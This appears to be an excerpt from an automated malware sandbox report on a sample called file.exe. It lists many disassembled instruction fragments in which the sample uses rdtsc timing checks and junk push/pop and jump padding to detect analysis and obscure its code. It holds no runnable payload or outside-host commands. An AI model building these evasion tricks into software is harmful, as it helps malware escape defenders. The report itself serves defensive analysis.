Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1DD61 second address: B1DD9B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4F79655h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push ecx 0x0000000e jmp 00007F1CB4F79654h 0x00000013 pop ecx 0x00000014 mov eax, dword ptr [eax] 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1DD9B second address: B1DD9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1DD9F second address: B1DDA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1F385 second address: B1F38A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1F38A second address: B1F392 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1F392 second address: B1F3A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B264A1 second address: B264AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F1CB4F79646h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB1513 second address: AB151C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edi 0x00000006 push esi 0x00000007 pop esi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B251B5 second address: B251D3 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F1CB4F79652h 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F1CB4F79646h 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B251D3 second address: B251D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B258D9 second address: B258F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F1CB4F79651h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B25A2C second address: B25A30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B25D2B second address: B25D4D instructions: 0x00000000 rdtsc 0x00000002 jc 00007F1CB4F79646h 0x00000008 jg 00007F1CB4F79646h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jp 00007F1CB4F7964Ch 0x00000016 popad 0x00000017 push edi 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B25D4D second address: B25D53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B25D53 second address: B25D57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B26026 second address: B26035 instructions: 0x00000000 rdtsc 0x00000002 js 00007F1CB4FA4D16h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B26035 second address: B2603D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B295F1 second address: B295FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007F1CB4FA4D16h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B295FF second address: B29605 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF0145 second address: AF015C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jno 00007F1CB4FA4D16h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jng 00007F1CB4FA4D16h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF015C second address: AF0166 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F1CB4F79646h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF06E0 second address: AF06EE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF06EE second address: AF06F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF06F4 second address: AF06FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF06FA second address: AF06FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF0DE0 second address: AF0E36 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F1CB4FA4D16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b nop 0x0000000c pushad 0x0000000d mov dword ptr [ebp+1245D33Eh], edx 0x00000013 cld 0x00000014 popad 0x00000015 mov dword ptr [ebp+122D1BC8h], edx 0x0000001b push 0000001Eh 0x0000001d pushad 0x0000001e jmp 00007F1CB4FA4D1Eh 0x00000023 jmp 00007F1CB4FA4D22h 0x00000028 popad 0x00000029 mov edx, 04646A00h 0x0000002e nop 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F1CB4FA4D1Fh 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF0F66 second address: AF0F6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF0F6A second address: AF0F73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B298CF second address: B298DE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 jc 00007F1CB4F79646h 0x0000000b pop ebx 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B29A49 second address: B29A4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B29A4D second address: B29A51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B29D5B second address: B29D5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B29D5F second address: B29D68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B29D68 second address: B29DB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 jmp 00007F1CB4FA4D20h 0x0000000e jmp 00007F1CB4FA4D28h 0x00000013 popad 0x00000014 push edx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 push esi 0x00000019 pop esi 0x0000001a jmp 00007F1CB4FA4D1Bh 0x0000001f popad 0x00000020 jbe 00007F1CB4FA4D1Eh 0x00000026 push edi 0x00000027 pop edi 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B29EA9 second address: B29EAF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B29EAF second address: B29EC9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4FA4D20h 0x00000007 jng 00007F1CB4FA4D1Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2A00C second address: B2A012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2A012 second address: B2A019 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2A019 second address: B2A053 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F1CB4F79658h 0x00000008 jbe 00007F1CB4F79646h 0x0000000e pop ecx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F1CB4F7964Bh 0x00000018 pushad 0x00000019 jno 00007F1CB4F79646h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2A053 second address: B2A059 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2A059 second address: B2A05E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2A05E second address: B2A063 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B315B4 second address: B315B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3050C second address: B30512 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B30512 second address: B30518 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B30518 second address: B3051E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B307B0 second address: B307B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B307B4 second address: B307C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F1CB4FA4D1Ch 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B307C8 second address: B307CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B307CD second address: B307DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F1CB4FA4D16h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3092B second address: B30931 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B30931 second address: B30973 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4FA4D1Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F1CB4FA4D1Eh 0x0000000e jmp 00007F1CB4FA4D28h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 jnc 00007F1CB4FA4D16h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B30973 second address: B30979 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B30979 second address: B3097E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3097E second address: B30999 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4F79655h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B30999 second address: B309A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F1CB4FA4D16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B309A3 second address: B309A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B30C39 second address: B30C64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F1CB4FA4D16h 0x0000000a jg 00007F1CB4FA4D16h 0x00000010 popad 0x00000011 push edx 0x00000012 jmp 00007F1CB4FA4D1Dh 0x00000017 pushad 0x00000018 popad 0x00000019 pop edx 0x0000001a pushad 0x0000001b jng 00007F1CB4FA4D16h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B30DE4 second address: B30E37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1CB4F79653h 0x00000008 jmp 00007F1CB4F79652h 0x0000000d jnp 00007F1CB4F79646h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 popad 0x00000016 jmp 00007F1CB4F7964Eh 0x0000001b pop edx 0x0000001c pop eax 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F1CB4F7964Fh 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B30E37 second address: B30E40 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B34876 second address: B34880 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F1CB4F79646h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B38E66 second address: B38E6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B392DC second address: B392E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B39440 second address: B39463 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1CB4FA4D25h 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007F1CB4FA4D16h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B39463 second address: B394A3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F1CB4F79654h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F1CB4F79657h 0x00000016 pop eax 0x00000017 jns 00007F1CB4F79648h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B39625 second address: B39629 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B39629 second address: B3963E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F1CB4F79646h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jo 00007F1CB4F79646h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3963E second address: B3965B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push ebx 0x00000007 jmp 00007F1CB4FA4D1Eh 0x0000000c jng 00007F1CB4FA4D1Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B39933 second address: B39965 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4F79656h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F1CB4F79658h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3CE51 second address: B3CE5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3CE5A second address: B3CE60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3CE60 second address: B3CE88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jnc 00007F1CB4FA4D1Eh 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push edx 0x0000000f pop edx 0x00000010 pushad 0x00000011 popad 0x00000012 jnc 00007F1CB4FA4D16h 0x00000018 popad 0x00000019 popad 0x0000001a pushad 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3CE88 second address: B3CE8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3CE8E second address: B3CEA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 jnl 00007F1CB4FA4D16h 0x0000000c pushad 0x0000000d popad 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3F62F second address: B3F64D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4F79654h 0x00000007 jne 00007F1CB4F79646h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3F64D second address: B3F67D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F1CB4FA4D16h 0x00000009 push esi 0x0000000a pop esi 0x0000000b jmp 00007F1CB4FA4D1Dh 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F1CB4FA4D25h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3F67D second address: B3F681 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3F8F6 second address: B3F919 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4FA4D27h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jbe 00007F1CB4FA4D22h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3F919 second address: B3F91F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3F91F second address: B3F927 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3F927 second address: B3F92B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3FAAD second address: B3FAC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jmp 00007F1CB4FA4D1Fh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3FAC5 second address: B3FACA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B41AE7 second address: B41AF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jnl 00007F1CB4FA4D16h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B41AF5 second address: B41AF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B41C34 second address: B41C64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1CB4FA4D24h 0x00000008 jmp 00007F1CB4FA4D1Fh 0x0000000d jne 00007F1CB4FA4D16h 0x00000013 popad 0x00000014 push esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B49192 second address: B4919C instructions: 0x00000000 rdtsc 0x00000002 jl 00007F1CB4F7964Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4919C second address: B491A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B491A3 second address: B491AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B479FA second address: B479FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B479FE second address: B47A0E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4F7964Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B47A0E second address: B47A18 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F1CB4FA4D22h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B47B68 second address: B47B6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B47B6C second address: B47B70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B47B70 second address: B47B78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B47B78 second address: B47B7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B47B7E second address: B47B82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B47CC4 second address: B47CD0 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F1CB4FA4D1Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B47CD0 second address: B47CD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAA850 second address: AAA85A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B48E43 second address: B48E4F instructions: 0x00000000 rdtsc 0x00000002 ja 00007F1CB4F79646h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
